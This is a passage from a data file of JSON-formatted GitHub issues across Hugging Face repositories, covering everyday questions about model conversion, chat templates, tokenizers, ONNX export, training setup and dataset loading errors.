dino from hf_hub, so how can I do this?", "url": "https://github.com/huggingface/pytorch-image-models/issues/2114", "state": "closed", "labels": [ "bug" ], "created_at": "2024-03-19T14:41:29Z", "updated_at": "2024-04-10T16:47:36Z", "user": "maywander" }, { "repo": "huggingface/transformers.js", "number": 653, "title": "Depth anything in Python", "body": "### Question\n\nAmazing demo for the depth-anything! \r\n\r\nI want to have a similar point cloud, but in Python, and wondering what's the logic behind your js [implementation](https://github.com/xenova/transformers.js/blob/main/examples/depth-anything-client/main.js).\r\n\r\nSpecifically:\r\n1. How do you set up the intrinsic matrix and backproject the depth map and color to the 3D space?\r\n2. What is the difference between `Xenova/depth-anything-small-hf` and `LiheYoung/depth-anything-small-hf`?\r\n\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/653", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-19T14:30:35Z", "updated_at": "2024-03-23T14:49:13Z", "user": "VladimirYugay" }, { "repo": "huggingface/optimum-benchmark", "number": 164, "title": "TensorRT-LLM - how to add support for new model?", "body": "Hello,\r\n\r\nI'm trying to run model ChatGLM, or Qwen or Bloom on TensorRT-LLM backend, but I'm getting NotImplemented exception or missing key. I think there is a way to add support, but it would be great to have some docs/tutorial how to do it.", "url": "https://github.com/huggingface/optimum-benchmark/issues/164", "state": "closed", "labels": [], "created_at": "2024-03-19T12:15:16Z", "updated_at": "2024-03-20T08:51:20Z", "user": "pfk-beta" }, { "repo": "huggingface/candle", "number": 1878, "title": "How to properly implement PT to safetensors conversion", "body": "Use the *pt format weight file obtained by pytorch training. It is then converted to the *bin format and then converted to the *safetensors format. Error message is reported in candle yolov8 with error message\r\nError: cannot find tensor net.b.1.0.bn.running_mean", "url": "https://github.com/huggingface/candle/issues/1878", "state": "closed", "labels": [], "created_at": "2024-03-19T11:51:59Z", "updated_at": "2024-04-06T11:37:24Z", "user": "EHW-liao" }, { "repo": "huggingface/alignment-handbook", "number": 138, "title": "How to select parts to bp in sft", "body": "![image](https://github.com/huggingface/alignment-handbook/assets/77482343/903dd930-18b3-4eec-9aba-1bc0248a5302)\r\nAs the pic has shown, there are some cases that some parts of the gpt's response should not be cacluated in backward computing, if I want to achieve this function, what should I do? (or can you realize this in a new version?) ", "url": "https://github.com/huggingface/alignment-handbook/issues/138", "state": "open", "labels": [], "created_at": "2024-03-19T10:26:49Z", "updated_at": "2024-03-19T10:26:49Z", "user": "Fu-Dayuan" }, { "repo": "huggingface/gsplat.js", "number": 76, "title": "How to start rendering with a local file path?", "body": "Hi, thanks for your work! \r\n\r\nI am new to JS and want to ask how to start rendering given a local path. I really appreciate any help you can provide.", "url": "https://github.com/huggingface/gsplat.js/issues/76", "state": "open", "labels": [], "created_at": "2024-03-18T07:13:31Z", "updated_at": "2024-04-18T13:14:24Z", "user": "yifanlu0227" }, { "repo": "huggingface/accelerate", "number": 2560, "title": "[Multi-GPU training] How to specific backend used in DDP training?", "body": "### System Info\n\n```Shell\n.....\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n......\n\n### Expected behavior\n\n\"image\"\r\n\r\nI encounter above errors when my problem have run 7 hours in 4 A100s, I don't known what's the cause of it, but the information suggests accelerate use GLOO as DDP backend, how to switch to NCCL? as my best knowledge, it's better than GLOO.", "url": "https://github.com/huggingface/accelerate/issues/2560", "state": "closed", "labels": [], "created_at": "2024-03-17T01:46:47Z", "updated_at": "2024-05-17T15:06:51Z", "user": "Luciennnnnnn" }, { "repo": "huggingface/swift-transformers", "number": 72, "title": "How to use BertTokenizer?", "body": "what is the best way to use the BertTokenizer? its not a public file so I'm not sure whats the best way to use it", "url": "https://github.com/huggingface/swift-transformers/issues/72", "state": "closed", "labels": [], "created_at": "2024-03-16T18:13:36Z", "updated_at": "2024-03-22T10:29:54Z", "user": "jonathan-goodrx" }, { "repo": "huggingface/chat-ui", "number": 934, "title": "What are the rules to create a chatPromptTemplate in .env.local?", "body": "We know that chatPromptTemplate for google/gemma-7b-it in .env.local is:\r\n\r\n\"chatPromptTemplate\" : \"{{#each messages}}{{#ifUser}}user\\n{{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}}\\nmodel\\n{{/ifUser}}{{#ifAssistant}}{{content}}\\n{{/ifAssistant}}{{/each}}\",\r\n\r\nand its chat template is:\r\n\"chat_template\": \"{{ bos_token }}{% if messages[0]['role'] == 'system' %}{{ raise_exception('System role not supported') }}{% endif %}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if (message['role'] == 'assistant') %}{% set role = 'model' %}{% else %}{% set role = message['role'] %}{% endif %}{{ '' + role + '\\n' + message['content'] | trim + '\\n' }}{% endfor %}{% if add_generation_prompt %}{{'model\\n'}}{% endif %}\",\r\n\r\nThe question is: \r\nAre there any rules that are used to create the chatPromptTemplate for a model? Usually we have\r\nthe chat template from the model. But when we need to use this model in chat-ui, we have to use chatPromptTemplate. \r\n", "url": "https://github.com/huggingface/chat-ui/issues/934", "state": "open", "labels": [ "question" ], "created_at": "2024-03-16T17:51:38Z", "updated_at": "2024-04-04T14:02:20Z", "user": "houghtonweihu" }, { "repo": "huggingface/chat-ui", "number": 933, "title": "Why the chat template of google/gemma-7b-it is invalid josn format in .env.local?", "body": "I used the chat template from google/gemma-7b-it in .env.local, shown below:\r\n\r\n\"chat_template\": \"{{ bos_token }}{% if messages[0]['role'] == 'system' %}{{ raise_exception('System role not supported') }}{% endif %}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if (message['role'] == 'assistant') %}{% set role = 'model' %}{% else %}{% set role = message['role'] %}{% endif %}{{ '' + role + '\\n' + message['content'] | trim + '\\n' }}{% endfor %}{% if add_generation_prompt %}{{'model\\n'}}{% endif %}\",\r\n\r\nI got this error:\r\n [vite] Error when evaluating SSR module /src/lib/server/models.ts:\r\n|- SyntaxError: Unexpected token ''', \"'[\" is not valid JSON\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/933", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-15T20:34:11Z", "updated_at": "2024-03-18T13:24:55Z", "user": "houghtonweihu" }, { "repo": "huggingface/diffusers", "number": 7337, "title": "How to convert multiple piped files into a single SafeTensor file?", "body": " How to convert multiple piped files into a single SafeTensor file?\r\n\r\nFor example, from this address: https://huggingface.co/Vargol/sdxl-lightning-4-steps/tree/main\r\n\r\n```python\r\nimport torch\r\nfrom diffusers import StableDiffusionXLPipeline, EulerDiscreteScheduler\r\n\r\nbase = \"Vargol/sdxl-lightning-4-steps\"\r\n\r\npipe = StableDiffusionXLPipeline.from_pretrained(base, torch_dtype=torch.float16).to(\"cuda\")\r\n```\r\n\r\nHow can I convert `pipe` into a single SafeTensor file as a whole?\r\n\r\n\r\nJust like the file `sd_xl_base_1.0_0.9vae.safetensors`, which contains the components needed from `diffusers`.\r\n\r\n_Originally posted by @xddun in https://github.com/huggingface/diffusers/issues/5360#issuecomment-1998986263_\r\n ", "url": "https://github.com/huggingface/diffusers/issues/7337", "state": "closed", "labels": [], "created_at": "2024-03-15T05:49:01Z", "updated_at": "2024-03-15T06:51:24Z", "user": "xxddccaa" }, { "repo": "huggingface/transformers.js", "number": 648, "title": "`aggregation_strategy` in TokenClassificationPipeline", "body": "### Question\n\nHello, from Transformers original version they have aggregation_strategy parameter to group the token corresponding to the same entity together in the predictions or not. But in transformers.js version I haven't found this parameter. Is it possible to provide this parameter? I want the prediction result as same as the original version.", "url": "https://github.com/huggingface/transformers.js/issues/648", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-15T04:07:22Z", "updated_at": "2024-04-10T21:35:42Z", "user": "boat-p" }, { "repo": "huggingface/transformers.js", "number": 646, "title": "Library no longer maintained?", "body": "### Question\n\n1 year has passed since this PR is ready for merge: [Support React Native #118](https://github.com/xenova/transformers.js/pull/118)\r\n\r\nShould we do our own fork of xenova/transformers.js ?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/646", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-14T10:37:33Z", "updated_at": "2024-06-10T15:32:41Z", "user": "pax-k" }, { "repo": "huggingface/tokenizers", "number": 1469, "title": "How to load tokenizer trained by sentencepiece or tiktoken", "body": "Hi, does this lib supports loading pre-trained tokenizer trained by other libs, like `sentencepiece` and `tiktoken`? Many models on hf hub store tokenizer in these formats", "url": "https://github.com/huggingface/tokenizers/issues/1469", "state": "closed", "labels": [ "Stale", "planned" ], "created_at": "2024-03-13T10:22:00Z", "updated_at": "2024-04-30T10:15:32Z", "user": "jordane95" }, { "repo": "huggingface/transformers.js", "number": 644, "title": "Contribution Question-What's next after run scripts.convert?", "body": "### Question\n\nHi @xenova I am trying to figure out how to contribute. I am new to huggingface. Just 2 months down the rabbit hole.\r\n\r\nI ran\r\n`python -m scripts.convert --quantize --model_id SeaLLMs/SeaLLM-7B-v2` \r\ncommand \r\n\r\nHere is a list of file I got in `models/SeaLLMs/SeaLLM-7B-v2` folder\r\n\r\n```\r\n_model_layers.0_self_attn_rotary_emb_Constant_5_attr__value\r\n_model_layers.0_self_attn_rotary_emb_Constant_attr__value\r\nconfig.json\r\ngeneration_config.json\r\nmodel.onnx\r\nmodel.onnx_data\r\nspecial_tokens_map.json\r\ntokenizer.json\r\ntokenizer.model\r\ntokenizer_config.json\r\n```\r\nDoes it work? \r\n\r\nWhat's next from here? Do I upload the models to huggingface?\r\n\r\nDo you have example commits or PR I should take a look? I have been scanning the model PR but none of which mentioned what happen after you ran `scripts/convert`\r\n\r\nI have seen some other issues mentioned the need for document. I know you don't have it yet. That's fine. That's why I am only asking for a hint or a little guidiance.", "url": "https://github.com/huggingface/transformers.js/issues/644", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-13T08:51:37Z", "updated_at": "2024-04-11T02:33:04Z", "user": "pacozaa" }, { "repo": "huggingface/making-games-with-ai-course", "number": 11, "title": "[UPDATE] Typo in Unit 1, \"What is HF?\" section. The word \"Danse\" should be \"Dance\"", "body": "# What do you want to improve?\r\nThere is a typo in Unit 1, \"What is HF?\" section.\r\nThe word \"Danse\" should be \"Dance\" \r\n\r\n- Explain the typo/error or the part of the course you want to improve\r\n\r\nThere is a typo in Unit 1, \"What is HF?\" section.\r\nThe word \"Danse\" should be \"Dance\"\r\n\r\nThe English spelling doesn't seem to include the French spelling. \r\nhttps://www.dictionary.com/browse/dance\r\n\r\nI assume this will also come up in later places, but I haven't gotten that far yet. :)\r\n\r\n\r\n# Actual Issue:\r\nIn this image:\r\nhttps://huggingface.co/datasets/huggingface-ml-4-games-course/course-images/resolve/main/en/unit1/unity/models4.jpg\r\nwhich is used here:\r\nhttps://github.com/huggingface/making-games-with-ai-course/blob/main/units/en/unit1/what-is-hf.mdx\r\n\r\n\r\n# **Also, don't hesitate to open a Pull Request with the update**. This way you'll be a contributor of the project.\r\nSorry, I have no access to the problematic image's source", "url": "https://github.com/huggingface/making-games-with-ai-course/issues/11", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-03-12T17:12:20Z", "updated_at": "2024-04-18T07:18:12Z", "user": "PaulForest" }, { "repo": "huggingface/transformers.js", "number": 642, "title": "RangeError: offset is out of bounds #601", "body": "### Question\r\n\r\n```\r\nclass NsfwDetector {\r\n constructor() {\r\n this._threshold = 0.5;\r\n this._nsfwLabels = [\r\n 'FEMALE_BREAST_EXPOSED',\r\n 'FEMALE_GENITALIA_EXPOSED',\r\n 'BUTTOCKS_EXPOSED',\r\n 'ANUS_EXPOSED',\r\n 'MALE_GENITALIA_EXPOSED',\r\n 'BLOOD_SHED',\r\n 'VIOLENCE',\r\n 'GORE',\r\n 'PORNOGRAPHY',\r\n 'DRUGS',\r\n 'ALCOHOL',\r\n ];\r\n }\r\n\r\n async isNsfw(imageUrl) {\r\n let blobUrl = '';\r\n try {\r\n // Load and resize the image first\r\n blobUrl = await this._loadAndResizeImage(imageUrl);\r\n const classifier = await window.tensorflowPipeline('zero-shot-image-classification', 'Xenova/clip-vit-base-patch16');\r\n const output = await classifier(blobUrl, this._nsfwLabels);\r\n console.log(output);\r\n const nsfwDetected = output.some(result => result.score > this._threshold);\r\n return nsfwDetected;\r\n } catch (error) {\r\n console.error('Error during NSFW classification: ', error);\r\n throw error;\r\n } finally {\r\n if (blobUrl) {\r\n URL.revokeObjectURL(blobUrl); // Ensure blob URLs are revoked after use to free up memory\r\n }\r\n }\r\n }\r\n\r\n async _loadAndResizeImage(imageUrl) {\r\n const img = await this._loadImage(imageUrl);\r\n const offScreenCanvas = document.createElement('canvas');\r\n const ctx = offScreenCanvas.getContext('2d');\r\n offScreenCanvas.width = 224;\r\n offScreenCanvas.height = 224;\r\n \r\n ctx.drawImage(img, 0, 0, offScreenCanvas.width, offScreenCanvas.height);\r\n \r\n return new Promise((resolve, reject) => {\r\n offScreenCanvas.toBlob(blob => {\r\n if (!blob) {\r\n reject('Canvas to Blob conversion failed');\r\n return;\r\n }\r\n const blobUrl = URL.createObjectURL(blob);\r\n resolve(blobUrl);\r\n }, 'image/jpeg');\r\n });\r\n }\r\n\r\n async _loadImage(url) {\r\n return new Promise((resolve, reject) => {\r\n const img = new Image();\r\n img.crossOrigin = 'anonymous';\r\n img.onload = () => resolve(img);\r\n img.onerror = () => reject(`Failed to load image: ${url}`);\r\n img.src = url;\r\n });\r\n }\r\n}\r\n\r\nwindow.NsfwDetector = NsfwDetector;\r\n\r\n```\r\n\r\nwhen used on a bunch of images, it fails, \"RangeError: offset is out of bounds\".\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/642", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-12T16:47:58Z", "updated_at": "2024-03-13T05:57:23Z", "user": "vijishmadhavan" }, { "repo": "huggingface/chat-ui", "number": 926, "title": "AWS credentials resolution for Sagemaker models", "body": "chat-ui is excellent, thanks for all your amazing work here!\r\n\r\nI have been experimenting with a model in Sagemaker and am having some issues with the model endpoint configuration. It currently requires credentials to be provided explicitly. This does work, but the ergonomics are not great for our use cases:\r\n- in development, my team uses AWS SSO and it would be great to use our session credentials and not need to update our MODELS environment variable manually every time our sessions refresh\r\n- in deployments, we would want to use an instance or task execution role to sign requests\r\n\r\nIn my investigation I found this area of code https://github.com/huggingface/chat-ui/blob/eb071be4c938b0a2cf2e89a152d68305d4714949/src/lib/server/endpoints/aws/endpointAws.ts#L22-L37, which uses the `aws4fetch` library that only support signing with explicitly passed AWS credentials.\r\n\r\nI was able to update this area of code locally and support AWS credential resolution by switching this to use a different library [`aws-sigv4-fetch`](https://github.com/zirkelc/aws-sigv4-fetch) like so:\r\n\r\n```ts\r\ntry {\r\n\tcreateSignedFetcher = (await import(\"aws-sigv4-fetch\")).createSignedFetcher;\r\n} catch (e) {\r\n\tthrow new Error(\"Failed to import aws-sigv4-fetch\");\r\n}\r\n\r\nconst { url, accessKey, secretKey, sessionToken, model, region, service } =\r\n\tendpointAwsParametersSchema.parse(input);\r\n\r\nconst signedFetch = createSignedFetcher({\r\n\tservice,\r\n\tregion,\r\n\tcredentials:\r\n\t\taccessKey && secretKey\r\n\t\t\t? { accessKeyId: accessKey, secretAccessKey: secretKey, sessionToken }\r\n\t\t\t: undefined,\r\n});\r\n\r\n// Replacer `aws.fetch` with `signedFetch` below when passing `fetch` to `textGenerationStream#options`\r\n```\r\n\r\nMy testing has found this supports passing credentials like today, or letting the AWS SDK resolve them through the default chain.\r\n\r\nWould you be open to a PR with this change? Or is there a different/better/more suitable way to accomplish AWS credential resolution here?\r\n", "url": "https://github.com/huggingface/chat-ui/issues/926", "state": "open", "labels": [], "created_at": "2024-03-12T16:24:57Z", "updated_at": "2024-03-13T10:30:52Z", "comments": 1, "user": "nason" }, { "repo": "huggingface/optimum", "number": 1754, "title": "How to tell whether the backend of ONNXRuntime accelerator is Intel VINO.", "body": "According to the [wiki](https://onnxruntime.ai/docs/execution-providers/#summary-of-supported-execution-providers), OpenVINO is one of the ONNXRuntime's execution providers.\r\n\r\nI am deploying model on Intel Xeon Gold server, which supports AVX512 and which is compatible with Intel OpenVINO. How could I tell if the accelerator is Default CPU or OpenVINO?\r\n\r\n```python\r\nfrom sentence_transformers import SentenceTransformer, models\r\nfrom optimum.onnxruntime import ORTModelForCustomTasks\r\nfrom transformers import AutoTokenizer\r\n\r\nort_model = ORTModelForCustomTasks.from_pretrained('Geotrend/distilbert-base-zh-cased', export=True)\r\ntokenizer = AutoTokenizer.from_pretrained(checkpoint)\r\n \r\nort_model.save_pretrained(save_directory + \"/\" + checkpoint)\r\ntokenizer.save_pretrained(save_directory + \"/\" + checkpoint)\r\n```\r\n```shell\r\nFramework not specified. Using pt to export to ONNX.\r\nUsing the export variant default. Available variants are:\r\n - default: The default ONNX variant.\r\nUsing framework PyTorch: 2.1.2.post300\r\n```", "url": "https://github.com/huggingface/optimum/issues/1754", "state": "closed", "labels": [], "created_at": "2024-03-12T08:54:01Z", "updated_at": "2024-07-08T11:31:13Z", "user": "ghost" }, { "repo": "huggingface/alignment-handbook", "number": 134, "title": "Is there a way to freeze some layers of a model ?", "body": "Can we follow the normal way of:\r\n\r\n```\r\nfor param in model.base_model.parameters():\r\n param.requires_grad = False\r\n```", "url": "https://github.com/huggingface/alignment-handbook/issues/134", "state": "open", "labels": [], "created_at": "2024-03-12T02:06:03Z", "updated_at": "2024-03-12T02:06:03Z", "comments": 0, "user": "shamanez" }, { "repo": "huggingface/diffusers", "number": 7283, "title": "How to load lora trained with Stable Cascade?", "body": "I finished a lora traning based on Stable Cascade with onetrainer, but I cannot find a solution to load the load in diffusers pipeline. Anyone who can help me will be appreciated.", "url": "https://github.com/huggingface/diffusers/issues/7283", "state": "closed", "labels": [ "stale" ], "created_at": "2024-03-12T01:33:01Z", "updated_at": "2024-06-29T13:35:45Z", "user": "zengjie617789" }, { "repo": "huggingface/datasets", "number": 6729, "title": "Support zipfiles that span multiple disks?", "body": "See https://huggingface.co/datasets/PhilEO-community/PhilEO-downstream\r\n\r\nThe dataset viewer gives the following error:\r\n\r\n```\r\nError code: ConfigNamesError\r\nException: BadZipFile\r\nMessage: zipfiles that span multiple disks are not supported\r\nTraceback: Traceback (most recent call last):\r\n File \"/src/services/worker/src/worker/job_runners/dataset/config_names.py\", line 67, in compute_config_names_response\r\n get_dataset_config_names(\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/inspect.py\", line 347, in get_dataset_config_names\r\n dataset_module = dataset_module_factory(\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 1871, in dataset_module_factory\r\n raise e1 from None\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 1846, in dataset_module_factory\r\n return HubDatasetModuleFactoryWithoutScript(\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 1240, in get_module\r\n module_name, default_builder_kwargs = infer_module_for_data_files(\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 584, in infer_module_for_data_files\r\n split_modules = {\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 585, in \r\n split: infer_module_for_data_files_list(data_files_list, download_config=download_config)\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 526, in infer_module_for_data_files_list\r\n return infer_module_for_data_files_list_in_archives(data_files_list, download_config=download_config)\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 554, in infer_module_for_data_files_list_in_archives\r\n for f in xglob(extracted, recursive=True, download_config=download_config)[\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/download/streaming_download_manager.py\", line 576, in xglob\r\n fs, *_ = fsspec.get_fs_token_paths(urlpath, storage_options=storage_options)\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/fsspec/core.py\", line 622, in get_fs_token_paths\r\n fs = filesystem(protocol, **inkwargs)\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/fsspec/registry.py\", line 290, in filesystem\r\n return cls(**storage_options)\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/fsspec/spec.py\", line 79, in __call__\r\n obj = super().__call__(*args, **kwargs)\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/fsspec/implementations/zip.py\", line 57, in __init__\r\n self.zip = zipfile.ZipFile(\r\n File \"/usr/local/lib/python3.9/zipfile.py\", line 1266, in __init__\r\n self._RealGetContents()\r\n File \"/usr/local/lib/python3.9/zipfile.py\", line 1329, in _RealGetContents\r\n endrec = _EndRecData(fp)\r\n File \"/usr/local/lib/python3.9/zipfile.py\", line 286, in _EndRecData\r\n return _EndRecData64(fpin, -sizeEndCentDir, endrec)\r\n File \"/usr/local/lib/python3.9/zipfile.py\", line 232, in _EndRecData64\r\n raise BadZipFile(\"zipfiles that span multiple disks are not supported\")\r\n zipfile.BadZipFile: zipfiles that span multiple disks are not supported\r\n```\r\n\r\nThe files (https://huggingface.co/datasets/PhilEO-community/PhilEO-downstream/tree/main/data) are:\r\n\r\n\"Capture\r\n", "url": "https://github.com/huggingface/datasets/issues/6729", "state": "closed", "labels": [ "enhancement", "question" ], "created_at": "2024-03-11T21:07:41Z", "updated_at": "2024-06-26T05:08:59Z", "user": "severo" }, { "repo": "huggingface/candle", "number": 1834, "title": "How to increase model performance?", "body": "Hello all,\r\n\r\nI have recently benchmarked completion token time, which is 30ms on an H100. However, with llama.cpp it is 10ms. Because [mistral.rs](https://github.com/EricLBuehler/mistral.rs) is built on Candle, it inherits this performance deficit. In #1680, @guoqingbao said that the Candle implementation is not suitable for batched computing because of naive CUDA kernels. What other areas could be optimized?", "url": "https://github.com/huggingface/candle/issues/1834", "state": "closed", "labels": [], "created_at": "2024-03-11T12:36:45Z", "updated_at": "2024-03-29T20:44:46Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers.js", "number": 638, "title": "Using an EfficientNet Model - Looking for advice", "body": "### Question\n\nDiscovered this project from the recent Syntax podcast episode (which was excellent) - it got my mind racing with different possibilities. \r\n\r\nI got some of the example projects up and running without too much issue and naturally wanted to try something a little more outside the box, which of course has led me down some rabbit holes.\r\n\r\nI came across this huggingface model;\r\nhttps://huggingface.co/chriamue/bird-species-classifier\r\nand https://huggingface.co/dennisjooo/Birds-Classifier-EfficientNetB2\r\n\r\nGreat, file size is only like 32 mb... however just swapping in this model into the example code didn't work - something about efficientnet models not supported yet. Okay I'll just try to convert this model with the provided script. \r\n\r\nSimilar error about EfficientNet... Okay I will clone the repo, and retrain using a different architecture... Then looking at the training data https://www.kaggle.com/datasets/gpiosenka/100-bird-species, it seems like maybe it's meant for efficientnet?\r\n\r\nAlso digging into how the above huggingface projects were done, I realized they are fine-tunes of other image classification models... \r\n\r\nSo my questions is, can I fine tune an existing transformer js image classification model? such as https://huggingface.co/Xenova/convnext-tiny-224 or am I better off using the original https://huggingface.co/facebook/convnext-tiny-224 model and creating a fine tune from there, then converting it to onnx using the script? \r\n\r\nThanks for your help on this and for this awesome project. Really just looking for some direction. ", "url": "https://github.com/huggingface/transformers.js/issues/638", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-11T01:31:49Z", "updated_at": "2024-03-11T17:42:31Z", "user": "ozzyonfire" }, { "repo": "huggingface/text-generation-inference", "number": 1636, "title": "Need instructions for how to optimize for production serving (fast startup)", "body": "### Feature request\n\nI suggest better educating developers how to download and optimize the model at build time (in container or in a volume) so that the command `text-generation-launcher` serves as fast as possible.\n\n### Motivation\n\nBy default, when running TGI using Docker, the container downloads the model on the fly and spend a long time optimizing it.\r\nThe [quicktour](https://huggingface.co/docs/text-generation-inference/en/quicktour) recommends using a local volume, which is great, but this isn't really compatible with autoscaled cloud environments, where container startup as to be as fast as possible.\n\n### Your contribution\n\nAs I explore this area, I will share my findings in this issue.", "url": "https://github.com/huggingface/text-generation-inference/issues/1636", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-03-10T22:17:53Z", "updated_at": "2024-04-15T02:49:03Z", "user": "steren" }, { "repo": "huggingface/optimum", "number": 1752, "title": "Documentation for exporting openai/whisper-large-v3 to ONNX", "body": "### Feature request\r\n\r\nHello, I am exporting the [OpenAI Whisper-large0v3](https://huggingface.co/openai/whisper-large-v3) to ONNX and see it exports several files, most importantly in this case encoder (encoder_model.onnx & encoder_model.onnx.data) and decoder (decoder_model.onnx, decoder_model.onnx.data, decoder_with_past_model.onnx, decoder_with_past_model.onnx.data) files. I'd like to also be able to use as much as possible from the pipe in the new onnx files:\r\n\r\n`pipe = pipeline(\r\n \"automatic-speech-recognition\",\r\n model=model,\r\n tokenizer=processor.tokenizer,\r\n feature_extractor=processor.feature_extractor,\r\n max_new_tokens=128,\r\n chunk_length_s=30,\r\n batch_size=16,\r\n return_timestamps=True,\r\n torch_dtype=torch_dtype,\r\n device=device,\r\n)`\r\n\r\nIs there documentation that explains how to incorporate all these different things? I know transformer models are much different in this whole process and I cannot find a clear A -> B process on how to export this model and perform tasks such as quantization, etc. I see I can do the following for the tokenizer with ONNX, but I'd like more insight about the rest I mentioned above (how to use the seperate onnx files & how to use as much as the preexisting pipeline). \r\n\r\n`processor.tokenizer.save_pretrained(onnx_path)`\r\n\r\nI also see I can do:\r\n\r\n`model = ORTModelForSpeechSeq2Seq.from_pretrained(\r\n model_id, export=True\r\n )`\r\n\r\nbut I cannot find documentation on how to specify where it is exported to, which seem's like I am either missing something fairly simple or it is just not hyperlinked in the documentation.\r\n\r\n### Motivation\r\n\r\nI'd love to see further documentation on the entire export process for this highly popular model. Deployment is significantly slowed due to there not being a easy to find A -> B process for exporting the model and using the pipeline given in the vanilla model. \r\n\r\n### Your contribution\r\n\r\nI am able to provide additional information to make this process easier.", "url": "https://github.com/huggingface/optimum/issues/1752", "state": "open", "labels": [ "feature-request", "onnx" ], "created_at": "2024-03-10T05:24:36Z", "updated_at": "2024-10-09T09:18:27Z", "comments": 10, "user": "mmingo848" }, { "repo": "huggingface/transformers", "number": 29564, "title": "How to add new special tokens", "body": "### System Info\n\n- `transformers` version: 4.38.0\r\n- Platform: Linux-6.5.0-21-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.13\r\n- Huggingface_hub version: 0.20.2\r\n- Safetensors version: 0.4.2\r\n- Accelerate version: not installed\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.2.0 (False)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: yes and no\r\n- Using distributed or parallel set-up in script?: no\r\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nExecute the code below:\r\n\r\n```\r\nfrom transformers import AutoTokenizer, AutoModel\r\nimport torch\r\nimport os\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset(\"ftopal/huggingface-datasets-processed\")\r\n\r\nos.environ['CUDA_LAUNCH_BLOCKING'] = \"1\"\r\n\r\n\r\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\r\n# device = torch.device(\"cpu\")\r\ncheckpoint = 'intfloat/multilingual-e5-base'\r\n\r\nmodel = AutoModel.from_pretrained(checkpoint)\r\ntokenizer = AutoTokenizer.from_pretrained(\r\n checkpoint, \r\n additional_special_tokens=['']\r\n)\r\nmodel.to(device)\r\n\r\nencoded_input = tokenizer(\r\n dataset['train'][0]['input_texts'], # A tensor with 2, 512 shape\r\n padding='max_length',\r\n max_length=tokenizer.model_max_length,\r\n truncation=True,\r\n return_tensors=\"pt\",\r\n)\r\n\r\nencoded_input_dict = {\r\n k: v.to(device) for k, v in encoded_input.items()\r\n}\r\n\r\nwith torch.no_grad():\r\n model_output = model(**encoded_input_dict)\r\n```\n\n### Expected behavior\n\nI expect this code to work however this results in very weird errors. More details on error stack trace can be found here: https://github.com/pytorch/pytorch/issues/121493\r\n\r\nI found that if I remove `additional_special_tokens` param, code works. So that seems to be the problem. Another issue is that it is still not clear (after so many years) how to extend/add special tokens into the model. I went through the code base to find this parameter but that seems to be not working alone and the whole stack trace isn't helpful at all.\r\n\r\nQuestions from my side:\r\n\r\n- What is the expected solution for this and could we document this somewhere? I can't find this anywhere or somehow i am not able to find this.\r\n- When setting this param is not enough, which seems to be the case, why are we not raising an error somewhere? ", "url": "https://github.com/huggingface/transformers/issues/29564", "state": "closed", "labels": [], "created_at": "2024-03-09T22:56:44Z", "updated_at": "2024-04-17T08:03:43Z", "user": "lordsoffallen" }, { "repo": "huggingface/datasets", "number": 6726, "title": "Profiling for HF Filesystem shows there are easy performance gains to be made", "body": "### Describe the bug\n\n# Let's make it faster\r\nFirst, an evidence...\r\n![image](https://github.com/huggingface/datasets/assets/159512661/a703a82c-43a0-426c-9d99-24c563d70965)\r\nFigure 1: CProfile for loading 3 files from cerebras/SlimPajama-627B train split, and 3 files from test split using streaming=True. X axis is 1106 seconds long.\r\n\r\nSee? It's pretty slow.\r\n\r\nWhat is resolve pattern doing?\r\n```\r\nresolve_pattern called with **/train/** and 